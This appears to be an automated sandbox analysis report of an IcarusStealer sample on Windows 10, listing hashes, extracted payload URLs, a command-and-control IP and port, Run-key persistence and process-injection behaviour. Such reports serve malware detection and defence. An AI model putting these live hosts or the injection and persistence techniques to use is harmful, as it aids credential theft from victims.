Analysis
-
max time kernel
93s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/10/2024, 16:02
Static task
static1
Behavioral task
behavioral1
Sample
3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe
Resource
win10v2004-20240802-en
General
-
Target
3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe
-
Size
3.9MB
-
MD5
65a683124fc4ca1839e95322370e2b0d
-
SHA1
7a7eafcfa4349e40cb15ab30b5c64d3415e60b96
-
SHA256
3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
-
SHA512
14b6d7d06f1bd02fffa5f0a4aecb8bbb7b1441597d9ac27a888f5ff441fce785809bd675c7ef7b1da7f99a8d61100e030b6c8b7b128515e8d713d4ffec54123f
-
SSDEEP
49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OcuulusUpdater = "C:\\Users\\Admin\\Music\\OcoulsUpdater\\EyesUpdater.exe" 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1084 set thread context of 2340 1084 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe 89 PID 2340 set thread context of 3376 2340 csc.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1084 wrote to memory of 2340 1084 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe 89 PID 1084 wrote to memory of 2340 1084 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe 89 PID 1084 wrote to memory of 2340 1084 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe 89 PID 1084 wrote to memory of 2340 1084 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe 89 PID 1084 wrote to memory of 2340 1084 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe 89 PID 2340 wrote to memory of 2736 2340 csc.exe 90 PID 2340 wrote to memory of 2736 2340 csc.exe 90 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91 PID 2340 wrote to memory of 3376 2340 csc.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe"C:\Users\Admin\AppData\Local\Temp\3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵PID:2736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM3⤵PID:3376
-
-